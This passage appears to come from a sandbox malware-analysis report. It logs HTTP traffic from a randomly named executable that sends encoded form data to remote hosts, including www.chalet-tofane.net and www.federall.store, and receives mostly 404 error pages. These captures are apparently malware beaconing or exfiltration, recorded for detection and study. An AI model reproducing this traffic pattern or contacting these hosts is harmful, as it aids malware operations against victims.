                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                                  Oct 7, 2024 10:39:26.122383118 CEST1236INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                                                  Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                                  Oct 7, 2024 10:39:26.122414112 CEST1236INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                                                  Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                                  Oct 7, 2024 10:39:26.122431040 CEST1236INData Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c
                                                                  Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                                                  Oct 7, 2024 10:39:26.122438908 CEST228INData Raw: 64 69 72 65 63 74 6f 72 79 20 61 6e 64 20 74 72 79 20 74 68 65 20 72 65 71 75 65 73 74 20 61 67 61 69 6e 2e 20 0a 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e
                                                                  Data Ascii: directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.104999162.149.128.40806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:39:27.993264914 CEST1831OUTPOST /vv4m/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.chalet-tofane.net
                                                                  Origin: http://www.chalet-tofane.net
                                                                  Referer: http://www.chalet-tofane.net/vv4m/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 56 46 46 44 44 31 77 41 74 4c 54 6c 74 76 57 34 39 68 74 65 35 41 73 68 6e 68 48 54 4e 74 42 51 2b 7a 66 2b 41 71 6b 42 48 66 30 78 2b 31 69 31 56 54 57 4b 76 78 70 75 76 6b 4f 75 36 51 70 56 5a 32 70 72 4a 72 73 6a 66 6e 79 59 4a 4b 38 46 45 58 65 47 48 4b 69 33 2f 5a 53 31 42 6f 68 59 36 46 49 50 58 63 61 52 79 7a 51 61 76 32 52 68 32 70 74 51 73 43 6c 75 46 54 35 58 59 74 66 70 70 78 51 56 6c 43 2f 4f 50 56 74 70 45 38 41 55 62 4e 74 77 53 4f 4c 6a 71 58 41 71 53 4a 32 6c 72 54 72 6c 79 30 6c 6e 38 74 6f 72 71 2f 41 30 34 6a 47 33 47 4b 72 52 52 4b 66 51 59 67 48 53 79 71 50 33 6c 52 4c 55 54 48 68 30 74 58 45 56 39 71 75 42 59 79 61 58 58 37 57 67 61 6f 56 38 46 53 34 63 44 41 36 53 6f 69 42 30 70 7a 4a 47 73 37 7a 68 70 39 31 52 62 2b 6c 61 39 6c 43 61 34 33 66 6e 70 7a 71 53 66 73 51 77 38 4a 50 4e 4e 54 35 71 33 79 73 6c 69 58 49 75 4b 76 6a 66 4a 38 31 4c 68 76 68 62 5a 55 52 64 6f 66 32 7a 59 61 54 63 54 6a 4f 6c 66 57 71 31 48 64 75 4a 38 2b 6a 46 32 59 73 68 78 62 77 4a [TRUNCATED]
                                                                  Data Ascii: EZ2lo=VFFDD1wAtLTltvW49hte5AshnhHTNtBQ+zf+AqkBHf0x+1i1VTWKvxpuvkOu6QpVZ2prJrsjfnyYJK8FEXeGHKi3/ZS1BohY6FIPXcaRyzQav2Rh2ptQsCluFT5XYtfppxQVlC/OPVtpE8AUbNtwSOLjqXAqSJ2lrTrly0ln8torq/A04jG3GKrRRKfQYgHSyqP3lRLUTHh0tXEV9quBYyaXX7WgaoV8FS4cDA6SoiB0pzJGs7zhp91Rb+la9lCa43fnpzqSfsQw8JPNNT5q3ysliXIuKvjfJ81LhvhbZURdof2zYaTcTjOlfWq1HduJ8+jF2YshxbwJr+PowR8PSzaO/mQAdyZ2yPIwkZC0DVaRX0d5lJ3Kx+8ry6eJejRQu0MLzMCqvQJsaXnwSqqOIZJHO7I9/WoPHrsX0dHwL3WigwL5AEK8uKKY9dLfy0jJ81hhLnxjjxXrglpIVfsFVo8/Fq4e85bslOVoABS/Txi2WLlpZwf+fddiuEAJl6IX+ULTMFFUn3Dz8gLJ7EkET3igAXOf5q+UjFFFtfbzv+r3RFCpP60yrit46oSDr3ccV1B1BdTzbEEqpil0jladT6d9U//0VAtm5aHv+meHMTI91d19iJcuNRZ+wylTHnu+QevNSSROrHdU4Yj3Anj/cKgPFhrzPODOAQwKHWcFy+ZRNq5F0bdV1bNJE7la6lQAbVjTGWDnMVrm7Jyf3qvgRLNx1usMpFLVxrTkDa/NG1JLNk9aWSudkFUA/Dw6O9VIOgdMbfQ4rQ8v/KisZYJ1kC+9ykQQPMTxKt+Xc/S30r0d5FypLQWxecEWNzjDrdpdvL+ssdX5u8B49Wr7EfKq5d0MfaG5kQUOef8xwPjSb3ighmnxS60yX7rPMmuB/RoOjUumVVuQ4GsmjdQt0lJvdn9Y8gn3v9BIDAtG/ckNs3SGLlRd2CvbT5dQE6vnuHb9y2P3ykOrIGdtOt4+tSok46kU16Ne2YkRTKPMNtgXYxa0i/ [TRUNCATED]
                                                                  Oct 7, 2024 10:39:28.656227112 CEST1236INHTTP/1.1 404 Not Found
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  Date: Mon, 07 Oct 2024 08:39:27 GMT
                                                                  Connection: close
                                                                  Content-Length: 4953
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                                  Oct 7, 2024 10:39:28.656358957 CEST1236INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                                                  Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                                  Oct 7, 2024 10:39:28.656414032 CEST1236INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                                                  Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                                  Oct 7, 2024 10:39:28.656450033 CEST1236INData Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c
                                                                  Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                                                  Oct 7, 2024 10:39:28.656480074 CEST228INData Raw: 64 69 72 65 63 74 6f 72 79 20 61 6e 64 20 74 72 79 20 74 68 65 20 72 65 71 75 65 73 74 20 61 67 61 69 6e 2e 20 0a 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e
                                                                  Data Ascii: directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.104999262.149.128.40806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:39:30.538971901 CEST520OUTGET /vv4m/?7NP=7FXXUPl&EZ2lo=YHtjADYkxu7EjL2CugAOyFkd+FKjIe5l/QKXGaE9Itky6wrTEgv0uDMpgH/UthNzfFIQLoI7VSX8KaEEAmnqI9GcxpfDY6d99mE8V8mh5Ak2zhlphg== HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.chalet-tofane.net
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:39:31.200469017 CEST1236INHTTP/1.1 404 Not Found
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  Date: Mon, 07 Oct 2024 08:39:29 GMT
                                                                  Connection: close
                                                                  Content-Length: 5092
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                                  Oct 7, 2024 10:39:31.200494051 CEST1236INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                                                  Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                                  Oct 7, 2024 10:39:31.200505972 CEST1236INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                                                  Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                                  Oct 7, 2024 10:39:31.200651884 CEST672INData Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c
                                                                  Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                                                  Oct 7, 2024 10:39:31.200666904 CEST931INData Raw: 49 65 35 6c 2f 51 4b 58 47 61 45 39 49 74 6b 79 36 77 72 54 45 67 76 30 75 44 4d 70 67 48 2f 55 74 68 4e 7a 66 46 49 51 4c 6f 49 37 56 53 58 38 4b 61 45 45 41 6d 6e 71 49 39 47 63 78 70 66 44 59 36 64 39 39 6d 45 38 56 38 6d 68 35 41 6b 32 7a 68
                                                                  Data Ascii: Ie5l/QKXGaE9Itky6wrTEgv0uDMpgH/UthNzfFIQLoI7VSX8KaEEAmnqI9GcxpfDY6d99mE8V8mh5Ak2zhlphg==</td></tr> <tr><th>Physical Path</th><td>&nbsp;&nbsp;&nbsp;D:\inetpub\wwwroot\vv4m\</td></tr> <tr class="alt"><th>Logon Method</th><td>&nbsp;&nbs


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.104999345.130.41.13806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:39:44.430542946 CEST785OUTPOST /avd1/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.federall.store
                                                                  Origin: http://www.federall.store
                                                                  Referer: http://www.federall.store/avd1/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 41 63 6b 69 6a 2b 62 74 72 54 62 65 55 44 31 53 54 71 32 4b 41 45 66 57 32 64 47 63 62 6e 2b 52 75 52 65 70 54 56 4d 4d 62 2f 53 37 4a 30 78 4c 69 4e 66 66 44 37 6d 50 53 66 4b 31 51 30 44 48 66 35 61 61 6c 2f 31 61 2f 76 37 78 71 37 55 66 62 78 45 6e 6b 31 6b 6d 4c 36 71 46 75 6b 6d 49 66 68 4d 4d 75 31 33 30 78 7a 4b 37 7a 6e 54 76 6f 73 4a 58 59 74 68 61 31 50 44 6d 4b 79 68 67 36 4c 44 62 45 44 31 50 5a 4b 61 6a 32 73 47 65 66 6f 6b 73 72 73 4a 4f 6c 70 42 5a 55 52 47 45 5a 78 78 6a 57 44 5a 6d 43 4d 66 2b 73 71 6f 64 79 4e 53 6b 5a 70 34 37 52 39 34 66
                                                                  Data Ascii: EZ2lo=Ackij+btrTbeUD1STq2KAEfW2dGcbn+RuRepTVMMb/S7J0xLiNffD7mPSfK1Q0DHf5aal/1a/v7xq7UfbxEnk1kmL6qFukmIfhMMu130xzK7znTvosJXYtha1PDmKyhg6LDbED1PZKaj2sGefoksrsJOlpBZURGEZxxjWDZmCMf+sqodyNSkZp47R94f
                                                                  Oct 7, 2024 10:39:45.159245014 CEST478INHTTP/1.1 404 Not Found
                                                                  Server: nginx-reuseport/1.21.1
                                                                  Date: Mon, 07 Oct 2024 08:39:44 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 5d f0 10 02 ba ed e2 42 5d 8b a6 07 8f d1 cc 92 42 6d 6a 32 6b f5 df 9b 76 11 bc 0c bc 99 6f 1e ef c9 8b f2 69 ab 5f 9b 0a 1e f4 63 0d 4d 7b 5f ef b7 b0 ba 46 dc 57 7a 87 58 ea f2 7c 59 8b 1c b1 3a ac 54 26 1d 7f f4 4a 3a 32 36 09 ee b8 27 55 e4 05 1c 3c c3 ce 9f 06 2b f1 bc cc 24 2e 90 7c f3 f6 67 fe bb 51 ff 98 a4 32 39 2a ed 08 02 7d 9e 28 32 59 68 9f 6b 98 4c 84 21 71 c7 99 03 3f 00 bb 2e 42 a4 f0 45 41 48 1c 67 a7 90 86 b1 36 50 8c ea 6e 34 ef 8e 70 2d 0a b1 d9 c0 65 3b 74 df 57 f0 b2 e0 60 18 a6 69 12 47 b2 14 4c df 8b c8 3e 10 34 3e 30 dc e6 12 ff 2c 52 d2 25 63 4a 35 77 cb 7e 01 3f 66 28 c3 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: e9MAK0`.]B]Bmj2kvoi_cM{_FWzX|Y:T&J:26'U<+$.|gQ29*}(2YhkL!q?.BEAHg6Pn4p-e;tW`iGL>4>0,R%cJ5w~?f(0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.104999445.130.41.13806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:39:46.980232954 CEST809OUTPOST /avd1/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.federall.store
                                                                  Origin: http://www.federall.store
                                                                  Referer: http://www.federall.store/avd1/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 41 63 6b 69 6a 2b 62 74 72 54 62 65 55 67 74 53 56 4a 65 4b 49 45 66 5a 36 39 47 63 56 33 2f 35 75 52 53 70 54 52 30 63 62 73 32 37 4b 56 74 4c 6a 49 72 66 4b 72 6d 50 4b 76 4b 30 64 55 44 32 66 35 57 53 6c 36 64 61 2f 70 58 78 71 2b 77 66 62 41 45 67 32 56 6b 6f 48 61 71 44 71 6b 6d 49 66 68 4d 4d 75 30 48 4f 78 7a 43 37 7a 33 44 76 71 4e 4a 55 51 4e 68 5a 38 76 44 6d 42 53 67 72 36 4c 43 72 45 42 42 6c 5a 4d 57 6a 32 75 65 65 4f 64 51 76 6c 73 4a 49 68 70 41 53 66 53 6d 4d 65 42 39 67 57 42 4e 46 58 4f 44 38 69 72 4a 61 6a 63 7a 7a 4b 65 6b 31 66 37 4e 31 34 6e 58 66 6e 31 64 58 69 59 63 6d 66 4b 65 6e 48 6b 79 6f 78 77 3d 3d
